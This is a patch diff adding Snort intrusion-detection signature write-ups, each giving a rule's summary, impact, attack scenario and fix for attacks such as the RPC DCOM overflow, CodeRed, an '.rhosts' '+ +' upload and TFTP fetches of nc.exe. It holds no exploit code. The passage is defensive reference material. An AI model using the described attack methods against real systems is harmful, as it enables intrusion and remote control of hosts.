+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1926.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1926
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all exported file systems and to indicate which clients are permitted to mount each file system.
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+
+--
--- /dev/null
+++ b/doc/signatures/2186.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2186
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2047.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2047
+
+--
+Summary:
+This event is generated when an attempt is made to access an rsync
+module list.
+
+--
+Impact:
+Information gathering. Possible theft of data.
+
+--
+Detailed Information:
+rsync is used to synchronize data between two machines across a network.
+It achieves this by only sending the differences between the files on 
+each host.
+
+Since it does not require both hosts to have the data it is 
+synchronizing, it is possible to retrieve a number of files from one 
+host without the corresponding files being present on the receiving 
+host.
+
+This presents the possibilty of using rsync to receive data from a
+protected machine to an external host.
+
+--
+Affected Systems:
+	All systems using rsync.
+
+--
+Attack Scenarios:
+The attacker needs to make an rsync request for available modules.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Systems using rsync to coordinate sets of data between hosts not in the 
+same LAN.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Access to files via rsync should be carefully managed using access 
+control lists.
+
+The transfer of files from an internal source to an external one should 
+be carefully managed using the appropriate firewall rules.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+rsync Home:
+http://samba.anu.edu.au/rsync/
+
+University of Washington:
+http://www.washington.edu/imap/buffer.html
+
+--
--- /dev/null
+++ b/doc/signatures/1894.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1894
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
--- /dev/null
+++ b/doc/signatures/2834.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2834
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_replication_package
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000498.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000498
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Calendarix" application running on a webserver. Access to 
+the file "cal_popup.php" with SQL commands being passed as the "id" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "cal_popup.php" script used by the 
+"Calendarix" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Calendarix
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1531.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1531
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2192.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2192
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000815.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000815
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "performs.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "performs.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/480.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+480
+
+--
+Summary:
+This event is generated when a benevolent ping used by SpeedEra.net to
+find the closest cache to a host is detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+After visiting certain speedera.net sites, several pings will be
+received by the host. These pings are sent so that speedera can find the
+closest cache to the host. This rule is intended to distinguish the
+usually benevolent speedera pings from normal, possibly malevolent pings.
+
+--
+Affected Systems:
+	All systems
+ 
+--
+Attack Scenarios:
+This is not really an attack.  However an attacker could disguise their
+pings as speedera pings, but this is unlikely.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+None required.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Drew Hintz ( http://guh.nu )
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Linux Security:
+http://www.linuxsecurity.com/articles/firewalls_article-2064.html
+
+--
--- /dev/null
+++ b/doc/signatures/3251.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3251
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000758.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000758
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "QTO File Manager" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "pathext" parameter in the "qtofm.php" script used by the "QTO File Manager" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using QTO File Manager
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1256.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid:
+1256
+
+--
+Summary:
+This event is generated when an attempt is made access the root.exe
+executable on a webserver. 
+
+--
+Impact:
+This activity is indicative of a CodeRed worm infection.
+
+--
+Detailed Information:
+As part of the CodeRed infection process, cmd.exe (the windows command
+interpreter) gets copied to a number of locations throughout the
+filesystem and named root.exe.  Following a modification to the registry,
+root.exe becomes available from the web, allowing remote machines to
+execute arbitrary commands.
+
+Only affects Windows machines with a listening webserver, primarily IIS.
+If root.exe does not exist, there is no impact aside from minor iritation.
+If root.exe _does_ exist, full system-level access at the priveledge level
+of the user running the webserver is possible.
+
+--
+Affected Systems:
+	Microsoft IIS web servers.
+ 
+--
+Attack Scenarios:
+Normally, access to root.exe is detected as part of an attempted infection
+by another machine already infected by CodeRed.  In other situations,
+root.exe may be accessed by remote machines/users in an attempt to gain
+access to a system.
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+If root.exe exists in the filesystem of the web server, remove the
+machine from the network and follow the vendor's recommend method for
+cleaning and repairing the damage done by this particular worm.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2001-19.html
+
+--
--- /dev/null
+++ b/doc/signatures/1225.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1225
+
+--
+Summary:
+This event is generated when an attempt to exploit a weakness in the authentication mechanism used to connect to an X windows server is made.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+Implementations of the X windows system from the X consortium may use weak authentication methods when allowing remote machines to connect to a host running X windows.
+
+XDM is used to allow remote users access to the remote X window server. When configured incorrectly, this may allow an unathorised user to connect to the display.
+
+--
+Attack Scenarios:
+The remote attacker may scan the host for listening X window servers, then connect to the remote host using XDM.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow connections to X servers from hosts outside the protected network.
+
+Apply the appropriate vendor patches.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0241
+
+CIAC:
+http://ciac.llnl.gov/ciac/bulletins/g-04.shtml
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS396
+
+--
--- /dev/null
+++ b/doc/signatures/888.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+888
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/335.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 335
+
+-- 
+Summary: 
+This event is generated when an attempt to copy a specific file to an FTP server is made.
+
+-- 
+
+Impact: 
+Serious. An attacker might gain the ability to remotely connect to a server via r-commands without using a password.
+
+--
+Detailed Information:
+This event is generated when an attempt to copy an ".rhosts" file to a server. An ".rhosts" file is used to configure remote access via r-commands (rlogin, rsh, rcp, rexec). 
+
+Specifically, the file might contain IP addresses (hostnames) or usernames that are allowed to connect to a server in the following format: "hostname [username]", where either can be a "+" character, indicating all hostnames or usernames. 
+
+The file might also contain a string "+ +" that indicates that everybody from any IP address is allowed to connect to server without using a password. The file is located in user's home directory.
+
+--
+
+Attack Scenarios: 
+An attacker uploads a ".hosts" file with "+ +" in it in the user's directory on the machine. He is then able to connect to a host via an "rlogin" command without entering a password, resulting in a shell session. If this is done in roots home driectory the attacker will have control of the victim host.
+
+-- 
+
+Ease of Attack: 
+The attack requires an access to any user's home directory via FTP. This means that anonymous FTP access cannot be used for such an attack and a valid username and password is required. Additionally, the ability to upload files via FTP is required for a successful attack.
+
+-- 
+
+False Positives: 
+If the string ".rhosts" is contained within the filename that is being uploaded to a server or within other FTP client responses, the rule will generate an event.
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Locate the uploaded ".rhosts" file and check it for signs of suspicious entries. 
+
+Check the server logs for other suspicious events that might have occurred within the same FTP session
+
+Disallow uploading of files via FTP and use Secure Shell (SSH) for transferring files by users.
+
+Disallow the use of r-commands for file transfer and login procedures.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS328
+
+--
--- /dev/null
+++ b/doc/signatures/2189.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2189
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/368.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+368
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Berkeley Systems Development (BSD) host.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running a BSD TCP/IP networking stack such as FreeBSD, NetBSD, or OpenBSD, will contain a unique payload in the message request.  
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS152
+
+--
--- /dev/null
+++ b/doc/signatures/521.txt
@@ -0,0 +1,54 @@
+Rule:
+--
+Sid:
+521
+
+--
+Summary:
+This event is generated when an overly large UDP packet is observed. 
+
+--
+Impact:
+Possible denial of service.  UDP packet payloads are typically smaller than 4000 bytes.  One possible explanation of a payload of greater than 4000 bytes is an attempted denial of service.
+
+--
+Detailed Information:
+UDP payloads are typically smaller than 4000 bytes since the UDP protocol is intended to be used for the transmission of smaller payloads.  When a large payload is observed, it may be a sign or anomalous activity, perhaps an attempted denial of service against the remote host. 
+
+--
+Affected Systems:
+Any system that listens for a UDP service. 
+
+--
+Attack Scenarios:
+An attacker may craft large UDP payloads in an attempt to cause a denial of service against a remote host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+There may be UDP services offered that naturally support large payload sizes.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Allow only known UDP protocols inbound.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS521
+
+--
--- /dev/null
+++ b/doc/signatures/1441.txt
@@ -0,0 +1,49 @@
+Rule:
+
+Sid:
+1441
+
+Summary:
+This event is generated when a TFTP GET request is made for "nc.exe".  This could be an indication that a remote attacker has compromised a Windows based system and is attempting to move attack tools onto the system.
+
+Impact:
+In normal situations this is a good indication that the host transmitting the request has been compromised by a remote attacker.  If the request was successful it is a clear indication that the host is now under the control of a remote attacker.  Once "nc.exe" is executed on the compromised system a remote attacker will be able to run arbitrary commands with the privilege level of the user that exected "nc.exe"
+
+Detailed Information:
+NetCat (nc.exe) is a widely used Unix and Windows utility that reads and writes data across network connections.  It can be used to redirect an application's input and output across a network and allows remote attackers an easy way to move rootkits and other tools onto a compromised system.  
+
+Currently this rule searches for "nc.exe" in TFTP GET requests.  Many times this rule will detect the first stages of a remote compromise attempt, as many attackers use NetCat to gain a command prompt on Windows based systems.
+
+Affected Systems
+Windows 95
+Windows 98
+Windows NT
+Windows 2000
+
+Attack Scenarios:
+Remote attackers use "nc.exe" to gain a command prompt "cmd.exe" on Windows based systems.  This allows for easy manipulation of the underlying file system, and also creates a simple attack vector for uploading rootkits and tools.
+
+Ease of Attack:
+Simple.  TFTP (Trivial File Transfer Protocol) is a simple method for transfering binary files across the Internet.  It requires minimal skill to use and is easy to operate in a restricted environment.
+
+False Positives:
+This rule was created to catch TFTP GET requests for "nc.exe", if this file name is being used during a legitimate TFTP session this rule will generate a false positive.
+
+False Negatives:
+Any attacker who changes "nc.exe" to another filename will bypass this rule.
+
+Corrrective Action:
